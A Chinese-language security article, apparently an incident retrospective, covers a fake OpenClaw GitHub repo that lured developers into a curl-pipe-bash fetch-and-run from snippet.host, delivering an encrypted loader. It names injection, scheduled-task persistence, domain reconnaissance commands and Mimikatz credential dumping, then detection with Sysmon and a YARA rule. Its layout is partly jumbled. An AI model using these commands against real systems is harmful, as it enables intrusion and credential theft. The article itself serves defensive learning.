ARTICLE · 1090934
伪包钓鱼:OpenClaw供应链狩猎
伪包钓鱼:OpenClaw供应链狩猎攻防实战复盘 伪包钓鱼:OpenClaw供应链狩猎 2026年09月28日 · 周一 真实攻击复盘高级 场景:2026年9月,某安全团队监测到攻击者伪造OpenClaw安装包上传至GitHub,通过snippet.host分段下发加密载荷,针对AI开发环境发起供应链钓鱼攻击。 攻击 / 事件时间线 1 初始访问 攻击者在GitHub创建高仿OpenClaw仓库,README中嵌入 GitHub钓鱼仓库snippet.hostcurl/bash 2 载荷投递 下载的“免责声明”文本中隐藏Base64分段密文,每段以 AES-256-CBCCrossHatch计划任务 3 横向移动 特马通过SCRM官方公告接口下发指令,利用ASAR未公开的 SCRM公告接口ASAR RCEMimikatz 蓝队视角 · 发现与处置 SOC值班人员发现EDR告警: 涉及关键技术 / 工具 分段载荷隐藏于文本资源ASAR RCE接口利用Sysmon日志与YARA联动检测 防护经验总结 #供应链攻击#OpenClaw#CrossHatch 数据安全早知道 · 攻防实战专栏 ⚠️ 免责声明 本文内容源自公开披露的安全事件或高仿真模拟场景,所有涉及的组织、系统、技术细节均经过脱敏处理,仅供安全学习与交流参考,不构成任何技术指导或合规建议。 数安早知道 🔗 数据安全与信息安全知识库 datasafe.website — 点击上方链接访问知识库,获取更多安全资讯 —
snippet.host短链,伪装成“加速安装脚本”。开发者执行curl -sL <短链> | bash后,脚本先检测/proc/cpuinfo中是否含hypervisor标志,确认非虚拟机后创建新线程,从snippet.host拉取分段载荷。#DISCLAIMER_0x0A标记。加载器通过正则提取分段,拼接后经AES-256-CBC解密,得到CrossHatch特马释放器。释放器将自身注入explorer.exe,并创建计划任务\Microsoft\Windows\Updater\OpenClawSync实现持久化。executeCommand接口RCE漏洞,以当前用户权限在域内主机执行whoami /all与net group "Domain Admins" /domain。随后使用Mimikatz的sekurlsa::logonpasswords抓取凭据,尝试连接域控445端口。explorer.exe发起对snippet.host的异常HTTPS请求,且计划任务创建行为触发Sysmon Event ID 1。蓝队立即隔离主机,提取内存镜像,通过YARA规则匹配到CrossHatch特征码rule CrossHatch_Loader { strings: $a = "DISCLAIMER_0x0A" }。同时封禁snippet.host域名,排查同网段其他主机,发现3台开发机存在相同计划任务,确认供应链攻击范围。对GitHub第三方安装包执行前,使用 sha256sum比对官方哈希,禁止直接curl | bash部署Sysmon并启用Event ID 1/3/11,针对 explorer.exe创建计划任务、访问陌生域名设置告警规则对SCRM等供应链组件启用ASAR完整性校验,限制 executeCommand接口仅允许白名单IP调用